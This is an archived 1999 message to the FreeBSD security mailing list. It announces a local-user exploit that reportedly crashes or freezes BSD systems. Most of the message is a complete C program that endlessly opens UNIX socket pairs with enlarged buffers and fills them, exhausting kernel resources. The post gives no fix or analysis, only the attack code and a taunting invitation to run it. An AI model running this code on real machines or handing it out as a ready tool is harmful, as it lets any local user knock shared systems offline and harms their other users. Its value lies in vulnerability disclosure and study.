From owner-freebsd-security Fri Sep 10 8:49:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp7.xs4all.nl (smtp7.xs4all.nl [194.109.127.50]) by hub.freebsd.org (Postfix) with ESMTP id 5BC6915D75 for ; Fri, 10 Sep 1999 08:49:01 -0700 (PDT) (envelope-from wdmgds@xs4all.nl) Received: from xs3.xs4all.nl (xs3.xs4all.nl [194.109.6.44]) by smtp7.xs4all.nl (8.9.3/8.9.3) with ESMTP id RAA20360 for ; Fri, 10 Sep 1999 17:48:52 +0200 (CEST) Received: from localhost (wdmgds@localhost) by xs3.xs4all.nl (8.9.0/8.9.0) with ESMTP id RAA02270 for ; Fri, 10 Sep 1999 17:21:27 +0200 (CEST) Date: Fri, 10 Sep 1999 17:21:27 +0200 (CEST) From: wdmgds To: freebsd-security@FreeBSD.ORG Subject: *bsd crashes/freezes/hangs on local user xploit Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear /etc compile this code snipplet and wheep ... it crashed and mutilated our 227 and 3x boxen.. BSDi4 just freezes a couple of seconds, bye -- #include #include #include #define BUFFERSIZE 204800 /* kiddy var le surgery */ extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message